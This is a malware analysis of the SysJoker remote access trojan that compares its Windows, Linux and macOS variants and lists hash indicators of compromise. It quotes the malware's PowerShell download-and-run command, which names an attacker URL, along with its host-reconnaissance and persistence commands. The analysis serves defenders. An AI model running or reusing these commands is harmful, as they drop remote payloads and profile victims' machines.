This article was written by Sagar Daundkar.
SysJoker RAT is cross-platform malware which targets Windows, Linux and macOS operating systems. Being cross-platform allows the malware authors to gain advantage of wide infection on all major platforms. SysJoker has the ability to execute commands remotely as well as download and execute new malware on victim machines. The major functionality remains the same in all three platforms due to its shared code. In this post, we will research further how the malware differs between the different operating system versions.
For the Windows version of SysJoker, the first stage malware is a DLL which downloads the main payload of the SysJoker RAT. The DLL uses powershell commands to download the zip file from the url, unzip it, then execute the final payload. Detailed behavior is as below:
It first creates a directory “C:\ProgramData\RecoverySystem”, then executes powershell to download zip from github containing the final payload msg.exe.
“powershell.exe Invoke-WebRequest -Uri ‘https://github.url-mini.com/msg.zip’ -OutFile ‘C:\ProgramData\RecoverySystem\recoveryWindows.zip’;Write-Output “Time taken : $((Get – Date).Subtract($start_time).Seconds) second(s)””
Furthermore, it extracts the downloaded recoveryWindows.zip in same directory where zip is downloaded with powershell command below:
“powershell.exe Expand-Archive -LiteralPath ‘C:\ProgramData\RecoverySystem\recoveryWindows.zip’ -DestinationPath ‘C:\ProgramData\RecoverySystem'”
Finally it launches the extracted msg.exe with powershell command:
“powershell.exe start C:\ProgramData\RecoverySystem\msg.exe”
Msg.exe sleeps multiple times to evade security products. It copies itself to “C:\ProgramData\SystemData\igfxCUIService.exe” with below powershell command:
“powershell.exe copy C:\ProgramData\RecoverySystem\msg.exe C:\ProgramData\SystemData\igfxCUIService.exe”
The malware then executes this igfxCUIService.exe to begin the RAT activity.
Figure 1. Code for executing the final RAT.
The final payload decodes the encoded responses from C2 by applying Base64 decode and XOR decryption sequentially. It first decrypts the Google Drive URL that points to an encrypted file that is used to determine the C2 internet address.
Figure 2. Code for Decrypting the GDrive URL
In sequence, the malware will run multiple command lines to collect various system information, which it will store into temporary text files. This collected information includes the network MAC address, hard drive serial number, current user name,OS info, and the IP address.
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe getmac | Out-File -Encoding Default C:\ProgramData\SystemData\temps1.txt ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding Default C:\ProgramData\SystemData\temps2.txt
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $env:username | Out-File -Encoding Default C:\ProgramData\SystemData\tempu.txt
- C:\Windows\System32\cmd.exe /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > C:\ProgramData\SystemData\tempo1.txt && type C:\ProgramData\SystemData\tempo1.txt > C:\ProgramData\SystemData\tempo2.txt
- C:\Windows\System32\cmd.exe /c wmic nicconfig where “IPEnabled = True” get ipaddress > C:\ProgramData\SystemData\tempi1.txt && type C:\ProgramData\SystemData\tempi1.txt > C:\ProgramData\SystemData\tempi2.txt
With above commands executed it creates JSON objects by reading through the temporary text files and encrypts it with XOR. This encrypted data is then base64 encoded and stored in the newly created “C:\ProgramData\SystemData\microsoft_Windows.dll” file. The plain text JSON object is as shown in Figure 3.
Figure 3. Json object for machine information before encryption
SysJoker sends this collected machine information as an initial beacon to the C2 server. After registering with the C2, it becomes available for the threat actor to send commands to execute. These commands send their results whether the command execution is successful or not. SysJoker supports receiving four commands from the C2 though, notably, they are not all functional:
- “cmd” command
Upon receiving a “cmd” network packet, the RAT will parse out the embedded command line sent by the threat actor and execute it with cmd.exe as shown in Figure 4. It will redirect the output of commands executed to a file named “C:\ProgramData\SystemData\txc1.txt”, which is then encoded and transmitted to C2. It can support almost all commands which can be executed with cmd.exe.
Figure 4. Code for processing cmd command
- “exe” command
Upon receiving an “exe” network packet, the RAT will parse out multiple components from the data. This includes an embedded URL from the packet. This URL is used to download a file and place it into the specified directory. Once downloaded, the file will be executed.
Figure 5. Code for processing exe command
- “remove_reg” and “exit” commands
There were two more commands found in code: remove_reg, and exit. However, these commands were not fully functional in the samples analyzed.
Figure 6. Parsing of remove_reg and exit commands
The Linux version of SysJoker has many similarities in behavior to the Windows version from the collection of system information and string decryption logic to supported commands. The xor decryption key is similar in both operating system versions.
The malware will first create persistence with a cron job. This job is set to execute a copy of the malware stored at “/home/$username/.Library/SystemServices/updateSystem”, as shown in Figure 7.
Figure 7. Terminal log of malware creating Cronjob scheduler.
The malware uses code shown in Figure. 8 to create a cron job by using the Linux crontab command.
Figure 8. Code for creating Cronjob scheduler on reboot
If the “updateSystem” file is already present at ““/home/$username/.Library/SystemServices”, and if any process is running with name “updateSystem”, then the malware kills that process and replace updateSystem file with self copy.
cp -rf ‘.’ ‘/home/username/.Library/SystemServices/updateSystem’
Code shown in Figure. 9 is used to form and execute above commands:
Figure 9. Code for updateSystem process kill
It then executes the ‘updateSystem’ with below command:
nohup ‘/home/username/.Library/SystemServices/updateSystem’ >/dev/null 2>&1
The updateSystem process will read a text file hosted on a Google Drive account to get the final C2 URL. The response is Base64 decoded and decrypted with an XOR key, as shown in Figure .
Figure 8. Code used to encrypt the response before sending
SysJoker will transmit the collected machine information to the C2 server and await further commands. These additional commands will be received in a similar packet structure that is XOR encrypted and Base64 encoded.
Like the Windows version of the malware, the Linux variant has minimal commands built into it. Below are the commands supported by RAT:
- cmd command
Upon receiving a “cmd” network packet, the RAT will parse out the embedded command line sent by the threat actor and execute it directly, as shown in Figure 9. The output of the command is then encrypted and sent to the C2 server.
Figure 9. Code for processing cmd command
- exe command
Upon receiving an “exe” network packet, the RAT will parse out multiple components from the data. This includes an embedded URL from the packet. This URL is used to download a file and place it into the specified directory. The downloaded file is expected to be a ZIP archive, which will be unzipped to an executable file. The malware sets this file as executable and then launches it, as shown in Figure 10.
Figure 10. Code for processing exe command
Once complete, the malware will send a basic response to the C2, as shown in Figure 11.
Figure 11. Response sent after execution of exe command
The MacOS version of malware has many similarities to the other versions. The malware is seen running with the filename of types-config.ts, copied to the directory of “/Library/MacOsServices/updateMacOs”. From the strings found in the malware we can get a basic understanding of its functionality, as shown in Figure 12.
Figure 12. String from macOS version of RAT
The malware persists on the system by using launchAgents named “Apple launch service” targeting
The other functionality is almost identical to Linux version of malware including C2 communications, commands, and responses.
Indicators of Compromise (IOCs)
|61df74731fbe1eafb2eb987f20e5226962eeceef010164e41ea6c4494a4010fc||SHA256||SysJoker Downloader DLL|
|d476ca89674c987ca399a97f2d635fe30a6ba81c95f93e8320a5f979a0563517||SHA256||SysJoker Downloader DLL|
|1a9a5c797777f37463b44de2b49a7f95abca786db3977dcdac0f79da739c08ac||SHA256||OSX SysJoker RAT|
|fe99db3268e058e1204aff679e0726dc77fd45d06757a5fda9eafc6a28cfb8df||SHA256||OSX SysJoker RAT|
|d0febda3a3d2d68b0374c26784198dc4309dbe4a8978e44bb7584fd832c325f0||SHA256||OSX SysJoker RAT|
|d1d5158660cdc9e05ed0207ceba2033aa7736ed1||SHA1||SysJoker Downloader DLL|
|554aef8bf44e7fa941e1190e41c8770e90f07254||SHA1||OSX SysJoker RAT|
|f5149543014e5b1bd7030711fd5c7d2a4bef0c2f||SHA1||OSX SysJoker RAT|
|01d06375cf4042f4e36467078530c776a28cec05||SHA1||OSX SysJoker RAT|
|d71e1a6ee83221f1ac7ed870bc272f01||MD5||SysJoker Downloader DLL|
|293f116c2c51473ae2bf7f4e787d3ec3||MD5||SysJoker Downloader DLL|
|e06e06752509f9cd8bc85aa1aa24dba2||MD5||OSX SysJoker RAT|
|6fb483e7ec55f8c56849d8f4f31bfd7b||MD5||OSX SysJoker RAT|
|85dbbaa8c4d37ebb9829464f0510787b||MD5||OSX SysJoker RAT|
Table 1. Indicators of Compromise (IOCs)